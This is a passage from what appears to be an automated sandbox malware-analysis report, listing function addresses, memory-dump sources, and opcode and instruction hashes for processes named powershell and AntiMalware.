                                                                        • Opcode Fuzzy Hash: f3aca2d56e572220def85f0ae341a8a845a237d25441f7988e55bb5647cf3fee
                                                                        • Instruction Fuzzy Hash: A6F05E32B0F5498FDB68EB5CE4618A877E4FF4932475600BAE15DCB4A3DA29BC40C750
                                                                        Function 00007FFD9B8A41D1 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2355648739.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90

                                                                        Non-executed Functions

                                                                        Function 00007FFD9B7D8BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N_^4$N_^5$N_^@$N_^N$N_^U$N_^Y
                                                                        • API String ID: 0-3838031992
                                                                        • Opcode ID: 47f78dbd9cb45479d4c530cf950437342e9a70edb1fc585a7365c8b83b617e36
                                                                        • Instruction ID: 0ec51611b7d34520eb8ed66ca5e1c05243c3ad37d509fad02647c459e7fe6eb0
                                                                        • Opcode Fuzzy Hash: 47f78dbd9cb45479d4c530cf950437342e9a70edb1fc585a7365c8b83b617e36
                                                                        • Instruction Fuzzy Hash: FF31F06BB085260AC315B6BCBD656EC6750DFD437A35642F7D398CB193CC24208B86C2
                                                                        Function 00007FFD9B7D89F2 Relevance: 6.3, Strings: 5, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N_^$N_^$N_^$N_^$N_^
                                                                        • API String ID: 0-1162251571
                                                                        • Opcode ID: 9f99e99c46c7f1b3386a2ccb3bbc977275d49ef71a56376d8c9a28ede283ca55
                                                                        • Instruction ID: e55533a35daee902482b85caa39be8f23ce2293c2d860a896cf35cd1978c9dee
                                                                        • Opcode Fuzzy Hash: 9f99e99c46c7f1b3386a2ccb3bbc977275d49ef71a56376d8c9a28ede283ca55
                                                                        • Instruction Fuzzy Hash: 1D31A6B2A0F6C34FD31A8B695C750957FE0EF9225830A43FBD198CB0B3ED181A478256

                                                                        Executed Functions

                                                                        Function 00007FFD9B7D16D9 Relevance: .8, Instructions: 753COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72aa7abcfd1b67c315ffa8448c51fb3af64f05407f31d8eaa6dc550380113470
                                                                        • Instruction ID: 1ceb155091d855fc739a58422b78591649ffa7a0c745f7c4f5efb4f88f191d71
                                                                        • Opcode Fuzzy Hash: 72aa7abcfd1b67c315ffa8448c51fb3af64f05407f31d8eaa6dc550380113470
                                                                        • Instruction Fuzzy Hash: B832A520B19A494FE798FB788479BBD77D2EFD8344F4506B9E00DC32E6DE28A9418741
                                                                        Function 00007FFD9B7D2059 Relevance: .2, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c72e83eb0604dd32a02e5c7ab36b789c7b17d352d8bffc20214eeb6ebb4c0ef
                                                                        • Instruction ID: 4167ebf7aa64ab8f9ab956ddd879f8f0b06c9f388c77a47a7dbcb74b8b6b93fc
                                                                        • Opcode Fuzzy Hash: 7c72e83eb0604dd32a02e5c7ab36b789c7b17d352d8bffc20214eeb6ebb4c0ef
                                                                        • Instruction Fuzzy Hash: 4F51EF10B1E6C94FD796ABB888746757FE5DF97219B0806FBE09DC61E7DD08180AC342
                                                                        Function 00007FFD9B7D11F2 Relevance: .5, Instructions: 513COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7918e4304b0a0738f18567849d693386f86683e60e8bd33774b0d7369662256a
                                                                        • Instruction ID: 23b36d9f92e1899b0501870409248a63ae07c4c35672c6ec316e516454888786
                                                                        • Opcode Fuzzy Hash: 7918e4304b0a0738f18567849d693386f86683e60e8bd33774b0d7369662256a
                                                                        • Instruction Fuzzy Hash: 1931B527E0E2D60ED711F7B8A4754EA3B70DF82229B1A46F7D0D9CE0E3DD1824498394
                                                                        Function 00007FFD9B7D09C8 Relevance: .3, Instructions: 317COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 51f7105f4d1172cc69ab7ccb2a7451991b81a30f2cace29ba469937822fcbfe8
                                                                        • Instruction ID: 001778b9b5488c12021571548918db0db254a436bd2e4e267a52dda1bad68c8d
                                                                        • Opcode Fuzzy Hash: 51f7105f4d1172cc69ab7ccb2a7451991b81a30f2cace29ba469937822fcbfe8
                                                                        • Instruction Fuzzy Hash: 94916A2BF0965A4AD705BB7DA425AED7B60EFC436AB0546B7D10CCB1D7CD28244AC3A0
                                                                        Function 00007FFD9B7D0E4E Relevance: .2, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c2c99b0f6d08c6ac78b602e7736262808180c00d0ffb142146a99974b0b2d73
                                                                        • Instruction ID: 25bc954dd000ad1e1ba85c90c69fc87b13012f439a666d54ce7c9d233adf207d
                                                                        • Opcode Fuzzy Hash: 3c2c99b0f6d08c6ac78b602e7736262808180c00d0ffb142146a99974b0b2d73
                                                                        • Instruction Fuzzy Hash: 0E512521B0D68A0FE356A73C98755B93BE1DFC626574941FBE08DC71E7DC085C468352
                                                                        Function 00007FFD9B7D0620 Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adfd0d0c2d17c4b2376435baf2762c1e6e1d60a9b97a010ca47f922d4eecc9b0
                                                                        • Instruction ID: c06bbec75cd47c3ee69f4197a592975948a3bebbf114044c8603057974212cb7
                                                                        • Opcode Fuzzy Hash: adfd0d0c2d17c4b2376435baf2762c1e6e1d60a9b97a010ca47f922d4eecc9b0
                                                                        • Instruction Fuzzy Hash: FD31D321B1C9490FE798EE6C846A779B6C2EFD8355F0506BEE05EC32E7DD64AC428341
                                                                        Function 00007FFD9B7D0CE1 Relevance: .1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dbc6ab63e5b25c0d52849dc9a5c207f61b597f889add31724e153b4c2ff2d181
                                                                        • Instruction ID: 55ec8532c795f0db314f1100270e0c4397899e3a116d85f2663fe25e185065c7
                                                                        • Opcode Fuzzy Hash: dbc6ab63e5b25c0d52849dc9a5c207f61b597f889add31724e153b4c2ff2d181
                                                                        • Instruction Fuzzy Hash: 0331F425F18A490FE794BBBC58297BD76D1EFD8751F0542BAE00CC32D7DD2868418392
                                                                        Function 00007FFD9B7D0B9C Relevance: .1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 012fd583006b306fa62067b0d7f8bc840d12f8ebb340cf8367ec6d9244671114
                                                                        • Instruction ID: d200ebef8688475a5d2ac7948ccfe57b43609bd05ba40a32c2c6e884edc9e5ad
                                                                        • Opcode Fuzzy Hash: 012fd583006b306fa62067b0d7f8bc840d12f8ebb340cf8367ec6d9244671114
                                                                        • Instruction Fuzzy Hash: E841B134B19A5E8FDB48EB688475AED7BB2FF98304F4145B9D009D32DACE386805C751
                                                                        Function 00007FFD9B7D2221 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2437117396.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7ffd9b7d0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af5e1a3b294afcbe10f4ff300e197fd6815d2c088d86f670ad8817a6d0a689d3
                                                                        • Instruction ID: 7102b5ea6df686a7536130bd03e1975bd8ba3aeda118b8a5940722c4732d6d97
                                                                        • Opcode Fuzzy Hash: af5e1a3b294afcbe10f4ff300e197fd6815d2c088d86f670ad8817a6d0a689d3
                                                                        • Instruction Fuzzy Hash: 72014C54A0E7890FE76166685875535BFE0CFD128070A07EAF488C20F7D8086B4A8391

                                                                        Executed Functions

                                                                        Function 00007FFD9B7E16D9 Relevance: .8, Instructions: 753COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd7f703149ef547771afabaa0c3d916508b2f7cfd137c551fe33f2e29909f856
                                                                        • Instruction ID: 28b21be98c5e897e5699446047f5a98d7a1dedbbcd70720080c7f0421d9672ee
                                                                        • Opcode Fuzzy Hash: fd7f703149ef547771afabaa0c3d916508b2f7cfd137c551fe33f2e29909f856
                                                                        • Instruction Fuzzy Hash: 1B32C860B19A494FE7A8EB7C94767BD77D2FF98704F4105B9E04DC32E6DE28A8018741
                                                                        Function 00007FFD9B7E2059 Relevance: .2, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb187c74da80b0abc022fe7d8c757db9f90d9483c25c0c5558357b9b020d4da5
                                                                        • Instruction ID: d78a8f315da07d0e62e38cf84dc2268ffdafec5ed480e96d611a588a1b5ddaa1
                                                                        • Opcode Fuzzy Hash: bb187c74da80b0abc022fe7d8c757db9f90d9483c25c0c5558357b9b020d4da5
                                                                        • Instruction Fuzzy Hash: 1451EC10B1E6C94FD7A6ABB848746A67FE5DF97219B0805FAE099C61E7DD082806C342
                                                                        Function 00007FFD9B7E11F2 Relevance: .5, Instructions: 513COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b52df6f140056765b831cf499e66c8c7771a36121814a691e51d8fc22b3e33c
                                                                        • Instruction ID: f112101f7d9ab2c92c5a71fb463b25832fd7c92959b6435997268d42e616842e
                                                                        • Opcode Fuzzy Hash: 6b52df6f140056765b831cf499e66c8c7771a36121814a691e51d8fc22b3e33c
                                                                        • Instruction Fuzzy Hash: DE31B527E0E6E50BD712F7B8A8755EA7F70DF82229B1A41F7D0D9CA0E3DC1824458384
                                                                        Function 00007FFD9B7E09C8 Relevance: .3, Instructions: 316COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b671e0b39979e233a0708dd2cee538cdc4e5763423f8452358f2a81cafa4aba
                                                                        • Instruction ID: d8719eceb4db9f2541b8894d57a74fc6fc6c18c0065ab0ed6ae91988ca65b4ed
                                                                        • Opcode Fuzzy Hash: 6b671e0b39979e233a0708dd2cee538cdc4e5763423f8452358f2a81cafa4aba
                                                                        • Instruction Fuzzy Hash: BF916B2BB0966A4BD705BBBCB825AED7B60EFC4366B1541B7D14CCB1E3CD24604687D0
                                                                        Function 00007FFD9B7E0E4E Relevance: .2, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83273a452f5fde9ed374c2cb9beb8809608bedcb0ddb51ce0fcfd9e5c5a326cc
                                                                        • Instruction ID: e9660fa29a648631b0eafbdc5f4d9dc5b9441e2f71ffdfe5dcc76200ef956ee4
                                                                        • Opcode Fuzzy Hash: 83273a452f5fde9ed374c2cb9beb8809608bedcb0ddb51ce0fcfd9e5c5a326cc
                                                                        • Instruction Fuzzy Hash: 6C512621B0E68A0FE356A77C98665B93BE1DF8622574941FBE08DCB1F7DC089C428352
                                                                        Function 00007FFD9B7E0620 Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7a227a6c2d42602bad2407bcf0b426f08a9d49854ae47ff8700ca50f9e2f263
                                                                        • Instruction ID: a28f086b979375c1dab18ecca8d3a4f7eae443cfc6c356ec5a02c35afee51b5e
                                                                        • Opcode Fuzzy Hash: c7a227a6c2d42602bad2407bcf0b426f08a9d49854ae47ff8700ca50f9e2f263
                                                                        • Instruction Fuzzy Hash: C631A221B1C9490FE798EE6C546A679B6C2EF98315F0505BEF05EC32E7DD64AC428341
                                                                        Function 00007FFD9B7E0CE1 Relevance: .1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da4364a8c549cde009d053d378a27853cd7baad1d588eaef288668229f5ffd3a
                                                                        • Instruction ID: 6a7062e8920ca2cd9438be3c0cb88d7e508cba6d5e8c29d6a484709fc8568bcb
                                                                        • Opcode Fuzzy Hash: da4364a8c549cde009d053d378a27853cd7baad1d588eaef288668229f5ffd3a
                                                                        • Instruction Fuzzy Hash: 1C31F821F18A490FE794BBBC586A7BC76D1EF98711F0542BAE00DC32E7DD2868014392
                                                                        Function 00007FFD9B7E0B9C Relevance: .1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e9410d80976123fe4717eb0518083185f7b38d334af202b374cea437f3dadd5
                                                                        • Instruction ID: 106ab2d144f98c24a0a6998ee84d21ee70562e455f3793ba65d6ae8e1a3a7d34
                                                                        • Opcode Fuzzy Hash: 7e9410d80976123fe4717eb0518083185f7b38d334af202b374cea437f3dadd5
                                                                        • Instruction Fuzzy Hash: 5C41B574B19A4E4FDB44EB688465AFE7BB1FF88300F5545B9D019D32E6CE38A801C751
                                                                        Function 00007FFD9B7E2221 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2540830156.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b7e0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1538ae8b21cef65f08e7781f0df618324de466eb74f33a872f5e8a4b0a53ae24
                                                                        • Instruction ID: 2704f7bcbc0fcbbe61bcd436ed78c64a87e01d5e1ab8799170d77cf53526bcf8
                                                                        • Opcode Fuzzy Hash: 1538ae8b21cef65f08e7781f0df618324de466eb74f33a872f5e8a4b0a53ae24
                                                                        • Instruction Fuzzy Hash: 43017B54E0EB8A0FE761A6B81875435BFE4CFD5340B0A05FAE888C20F7ED085B458392

                                                                        Executed Functions

                                                                        Function 00007FFD9B7F16D9 Relevance: .8, Instructions: 753COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f454aa18f55a7152bc4b0c67d04834c97799dafc4b0ebaa09533ec27293e717d
                                                                        • Instruction ID: 9356396c6b652f447b2c7f88ff7a31b9eb445cdc87f9c166afffe95962442ade
                                                                        • Opcode Fuzzy Hash: f454aa18f55a7152bc4b0c67d04834c97799dafc4b0ebaa09533ec27293e717d
                                                                        • Instruction Fuzzy Hash: 4232C661B19A4D4FE758EB789879BBD77D2EFD8300F4106B9E44DC32E6DD28A8018781
                                                                        Function 00007FFD9B7F2059 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 478d3f8eb0b5b4741e13a070b6d36a7e12cc1dcf22907b7ea02f8013a02ac8e4
                                                                        • Instruction ID: d48976ef5bae25e7d4367fb7ffcdb2a05aa35d0c11365eecda9203539112a936
                                                                        • Opcode Fuzzy Hash: 478d3f8eb0b5b4741e13a070b6d36a7e12cc1dcf22907b7ea02f8013a02ac8e4
                                                                        • Instruction Fuzzy Hash: EA510D20B1E6C94FD7A6ABB848746A57FE5DF87219B0801FBE09DC61E7DD081806C386
                                                                        Function 00007FFD9B7F11F2 Relevance: .5, Instructions: 513COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95b5d9cd3a2ecfad590d2e84157438bc2820e24cb5d7c8a91188514a84f73360
                                                                        • Instruction ID: 3134fd8fd535883ba3fd05f79568faf292d45415cd9d93966f6541bad60f19b8
                                                                        • Opcode Fuzzy Hash: 95b5d9cd3a2ecfad590d2e84157438bc2820e24cb5d7c8a91188514a84f73360
                                                                        • Instruction Fuzzy Hash: 91319327F0E2DA4ED712F7B8A8754E97F70DF82229B1A42F7D0D98A0E3DC1825458394
                                                                        Function 00007FFD9B7F09C8 Relevance: .2, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b7575521068dc09423b3b38c1fd8c82250e030094324ca60c6ce2728f8dbbd6
                                                                        • Instruction ID: ee08b81beb3cbeb1327e19520aa8b14d7f31425dc27a73137e8b4fad642230f7
                                                                        • Opcode Fuzzy Hash: 1b7575521068dc09423b3b38c1fd8c82250e030094324ca60c6ce2728f8dbbd6
                                                                        • Instruction Fuzzy Hash: E471563AB0965E8ED705BB78A864AFD7B60EFC0325F5542BAD01CCB2D7CD28640687D0
                                                                        Function 00007FFD9B7F0E4E Relevance: .2, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d1c89e80df70736d20c92fdd4eb3ed8a30c823f185b4dc962a1d966e10c5ef7
                                                                        • Instruction ID: c159dedc19d1e9647d2f8350c8299c8defe81dfcaa7cbb44810c57beb456f831
                                                                        • Opcode Fuzzy Hash: 9d1c89e80df70736d20c92fdd4eb3ed8a30c823f185b4dc962a1d966e10c5ef7
                                                                        • Instruction Fuzzy Hash: C5510821B0E68A0FE356AB7C58655B93FE1DF86225B4942FBE08DC71E7DC1C5C428392
                                                                        Function 00007FFD9B7F0AFA Relevance: .2, Instructions: 196COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 060de68493408ab4d9c41be9120b3f74ed724c4a8e37a7b2b96a3b89d22ed0e5
                                                                        • Instruction ID: fecaef769efdfab101f4ad715bdbc1e66c0420f416c23c3aa871572516e13567
                                                                        • Opcode Fuzzy Hash: 060de68493408ab4d9c41be9120b3f74ed724c4a8e37a7b2b96a3b89d22ed0e5
                                                                        • Instruction Fuzzy Hash: A451243AB09A5E8FDB05FB7CA865AEC7BB1EFC4315B4542BAD008C72D6CD2564068790
                                                                        Function 00007FFD9B7F0620 Relevance: .1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2972c8a49353710998798ff1c7b1275ae2739281c148f1c4d690c152d4301c1b
                                                                        • Instruction ID: 8316212310f222d0d78540fb29aa132ab88fde74aceab3fe338b84fcc3d4dfb9
                                                                        • Opcode Fuzzy Hash: 2972c8a49353710998798ff1c7b1275ae2739281c148f1c4d690c152d4301c1b
                                                                        • Instruction Fuzzy Hash: 1531A321B1C9490FE798EE6C546A679B7C2EF98305F4505BEF05EC32E7DD54AC028345
                                                                        Function 00007FFD9B7F0CE1 Relevance: .1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05800438ceea3af8918377a8cd6f185a21d2179d5ed293e453baa1a1f792ae3e
                                                                        • Instruction ID: ff6c35a22b3b27452592fa33aa77c9e8c5cccafa0d1179d2163f3d9b8d8d5ea1
                                                                        • Opcode Fuzzy Hash: 05800438ceea3af8918377a8cd6f185a21d2179d5ed293e453baa1a1f792ae3e
